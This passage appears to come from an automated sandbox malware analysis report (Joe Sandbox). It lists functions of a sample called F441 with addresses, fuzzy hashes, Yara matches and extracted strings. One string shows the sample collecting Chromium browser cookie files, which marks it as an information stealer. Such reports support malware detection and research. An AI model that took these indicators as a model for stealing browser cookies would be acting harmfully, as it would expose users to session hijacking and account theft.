                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                                                • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                                • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                                                Function 021164EB Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction ID: b26620ab2ec6bb47b95bd15f64e4773a4c1073b4c8a9e26742fc95e604f52d1c
                                                                                • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction Fuzzy Hash: 46F180B0645B808FE339CF25C0A47A3BBE5BF56304F44896DC4EB8B685D77AA009CB55
                                                                                Function 00426284 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                                                • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                                • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                                                Function 020F4BD7 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$IEND
                                                                                • API String ID: 0-707183367
                                                                                • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                                • Instruction ID: 364c85f06c823bb31809a7d247932c9efeb54b81aae69397f5955c6d539ecc52
                                                                                • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                                • Instruction Fuzzy Hash: 36E1BEB2A483449FD754CF28C88079FBBE1AF84304F05852DFA999B781D775E904DB92
                                                                                Function 021164D8 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction ID: c714c074e18e67a207e1eaffbc14f31ef28713ff096c492269821138b54cb3f8
                                                                                • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction Fuzzy Hash: 9AD18170245B908FE3258F25C0A57E3BBE6BF56308F48896DC4EB4B685C77A6009CB55
                                                                                Function 00426271 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452$JlRp
                                                                                • API String ID: 0-1201309010
                                                                                • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
                                                                                • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                                • Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59
                                                                                Function 02110AE7 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ]hiX$gdeb
                                                                                • API String ID: 0-4273025081
                                                                                • Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                                • Instruction ID: 8efb16796d372884df47e1877e09d097828e9ac6eeafc236761692ad7f512a12
                                                                                • Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                                • Instruction Fuzzy Hash: 41C1C4B1A493418FD714CF14C89176BB7E2EF89318F198A3DE89587380E736D985CB86
                                                                                Function 00433D0A Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb
                                                                                • API String ID: 0-1883251077
                                                                                • Opcode ID: dadfc9a4520318b08f1e55189e06e8e41a168fd232f51a31a4105b0fbe4340ce
                                                                                • Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
                                                                                • Opcode Fuzzy Hash: dadfc9a4520318b08f1e55189e06e8e41a168fd232f51a31a4105b0fbe4340ce
                                                                                • Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58
                                                                                Function 00423AD0 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb
                                                                                • API String ID: 0-1883251077
                                                                                • Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                                • Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
                                                                                • Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                                • Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84
                                                                                Function 02126117 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                                • Instruction ID: fba0c56560f0148ad0bfeab676171ba279f6e05e820e7f16fadc20ae03177340
                                                                                • Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                                • Instruction Fuzzy Hash: 9F22A0B16483A18FD714CF18C890B2BBBE5BB89318F188A2DF5D497391C775D819CB92
                                                                                Function 00435EB0 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                                • Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
                                                                                • Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                                • Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A
                                                                                Function 020F1267 Relevance: 1.8, Strings: 1, Instructions: 519COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                                • Instruction ID: e3213728ccb895ed7b99e90daa4fde58df40b7e06253d1712cf56298e04ade1d
                                                                                • Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                                • Instruction Fuzzy Hash: AC123771948381DBEB95CE18C0A13AFBFE2AB95314F08851DEADD47BD1C3398445E782
                                                                                Function 02106B56 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: IO
                                                                                • API String ID: 0-3981347273
                                                                                • Opcode ID: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                                                • Instruction ID: 1a8a31ca2e75f85ca6550bf82561fa88dbf8b13866132d401320c90bf228cb5a
                                                                                • Opcode Fuzzy Hash: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                                                • Instruction Fuzzy Hash: 2ED111B1200B018FD724CF15C590B12BBF2BF4A704F188A9CD89A8FB96D779E855CB84
                                                                                Function 02106739 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • v[info] collected cookies file of the chromium-based browser, xrefs: 02106A1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: v[info] collected cookies file of the chromium-based browser
                                                                                • API String ID: 0-1851104220
                                                                                • Opcode ID: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                                                • Instruction ID: 5fb017e02d331230d8140237736cc5c6f7c2b4f9144686630b01e65f3e67874e
                                                                                • Opcode Fuzzy Hash: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                                                • Instruction Fuzzy Hash: FDA1CFB06457818FD728CF29C4D0722BBE2BF56304F18869CC4964FB96C376E856CB94
                                                                                Function 004164D2 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • v[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: v[info] collected cookies file of the chromium-based browser
                                                                                • API String ID: 0-1851104220
                                                                                • Opcode ID: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                                                • Instruction ID: e2aff65f3d6dc5062d0ba04aa46064ddba6db07fd0ccc2038df325f36c3021e5
                                                                                • Opcode Fuzzy Hash: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                                                • Instruction Fuzzy Hash: 9EA18C706057418FD725CF28C1907A3BBE2BF66304F19869DC4964F796D33AE886CB98
                                                                                Function 0212AF97 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                                                • Instruction ID: 80286e08b82fa1bb68c02fd41cf10b6d41cc649c562a5ed10cafc5b5308addd7
                                                                                • Opcode Fuzzy Hash: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                                                • Instruction Fuzzy Hash: E0919E716093229BD718CF18D8A0B6BB7E2FF84758F18891CF8854B250D735E925CB92
                                                                                Function 0043AD30 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: e6b1fefa5b3413c45c984380b7a356c574af97ad99cae545bd813dfb0ea40b49
                                                                                • Instruction ID: b21458e9d172f3a465188df86c848c015b63d16b5f46d67e3e5fb2f613f60a17
                                                                                • Opcode Fuzzy Hash: e6b1fefa5b3413c45c984380b7a356c574af97ad99cae545bd813dfb0ea40b49
                                                                                • Instruction Fuzzy Hash: 8391DF746053029BDB28CF19C890B6BB7E2FF88754F18951DE8858B790D738EC61CB96
                                                                                Function 004067B0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,
                                                                                • API String ID: 0-3772416878
                                                                                • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                                                • Instruction ID: 49ac68bff1f266d30a48b1e8e6a747f7736882c678fe7bbee82a01b3dca97335
                                                                                • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                                                • Instruction Fuzzy Hash: 92B139715093819FD314DF68C84465BBBE0AFA9304F448A6EF49997382C375EA28CB96
                                                                                Function 021268D7 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
                                                                                • Instruction ID: a802f71471ba3e75941f5149ea11f0d487684742245d6d35568ca247925ddeb9
                                                                                • Opcode Fuzzy Hash: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
                                                                                • Instruction Fuzzy Hash: E881D17164C2A18FC719CF28C4E062EFBE6AF85214F19867DE4E54B392CB35D849CB42
                                                                                Function 00436670 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ' !"
                                                                                • API String ID: 0-2098420348
                                                                                • Opcode ID: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
                                                                                • Instruction ID: f7e06bb7343a789ad0a08b08bc7e5896dfb3b66a2a1c14d4cc0749131caaa646
                                                                                • Opcode Fuzzy Hash: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
                                                                                • Instruction Fuzzy Hash: 5281F374A0D2525BC319CF28C49062EFBE2AFD9314F1AD67EE4E54B392C638D805CB56
                                                                                Function 0041CCD0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7452
                                                                                • API String ID: 0-87867774
                                                                                • Opcode ID: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
                                                                                • Instruction ID: 1067625b523eb8300719b926f48d8486b81893701fcfb7bf3f689dc49be56a81
                                                                                • Opcode Fuzzy Hash: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
                                                                                • Instruction Fuzzy Hash: C251ACB9548301DBE3048F14ED9076BB7E5FB8A318F44496DE98593390D778E840CBAA
                                                                                Function 02113B98 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb
                                                                                • API String ID: 0-1935535308
                                                                                • Opcode ID: bb4c6a40628cef2fd2d0a0d1584b68ab74d50620ab1cd7c52e2b3df6b132bd3e
                                                                                • Instruction ID: f918dfac121e6b378cf9e5251959372b4db200d03b48ded4b3bbcffd175a4d66
                                                                                • Opcode Fuzzy Hash: bb4c6a40628cef2fd2d0a0d1584b68ab74d50620ab1cd7c52e2b3df6b132bd3e
                                                                                • Instruction Fuzzy Hash: 7B218D742917018FDB389F14C4A5B3AB7A2FF81308F5859ACD4A307E99D735E442CB98
                                                                                Function 00423931 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb
                                                                                • API String ID: 0-1935535308
                                                                                • Opcode ID: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
                                                                                • Instruction ID: d4aa4b60c4f404011ded0bfc51642dd63f19c3ddecb79c10eafa6cd19f5c7a0d
                                                                                • Opcode Fuzzy Hash: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
                                                                                • Instruction Fuzzy Hash: E8217AB42156009BD7288F14D5A173B73B2BB86306F94195DD48307F91C779AA829B98
                                                                                Function 02112D5B Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb
                                                                                • API String ID: 0-1935535308
                                                                                • Opcode ID: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
                                                                                • Instruction ID: b6b33bbc7774c0ca332611e4d3774dd63e8aba1b46cf94635f74d2c321f5a7e5
                                                                                • Opcode Fuzzy Hash: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
                                                                                • Instruction Fuzzy Hash: D32125742493919BE718CF04C5E4B6FB7E2BFC5708F64992CE8891B651C735D802DB82
                                                                                Function 00422AFB Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb
                                                                                • API String ID: 0-1935535308
                                                                                • Opcode ID: 7a72662ce85abd495c93b74e8fedf65068ba62353161d4912cf2ccd350f2e7c8
                                                                                • Instruction ID: cfbb71919b36defe00f02a2a2c25438a224e3326f250cf6f214dc5f0775f29cc
                                                                                • Opcode Fuzzy Hash: 7a72662ce85abd495c93b74e8fedf65068ba62353161d4912cf2ccd350f2e7c8
                                                                                • Instruction Fuzzy Hash: D6211674208251ABD714CF04D6E0B6BBBE2BBC9704F94991DE8891B651C779AC02DB86
                                                                                Function 02123E13 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb
                                                                                • API String ID: 0-1935535308
                                                                                • Opcode ID: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                                                • Instruction ID: 91cfe09b01ef373197ce32bd43227df850e9413342f0f7977d361ee3b68a79f3
                                                                                • Opcode Fuzzy Hash: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                                                • Instruction Fuzzy Hash: 33115C74644B018BE738CF15D4A1B3BB7E2FF49314F24495CD4AA07AA1C735E469CB54
                                                                                Function 02105D61 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2
                                                                                • API String ID: 0-450215437
                                                                                • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                                                • Instruction ID: 7c2688041e6f2b17666254e99862e243a66767b6d0083ecdbc65dac262f7102b
                                                                                • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                                                • Instruction Fuzzy Hash: 7C2134715583408FD308CF18C89075BFBF1BB86308F195D2DE99197241C779CA098F8A
                                                                                Function 00415AFA Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2
                                                                                • API String ID: 0-450215437
                                                                                • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                                                • Instruction ID: f5e089a6dac0a0523a871d18e63b6fe0fba65fab962518bccecdf147c50fc5da
                                                                                • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
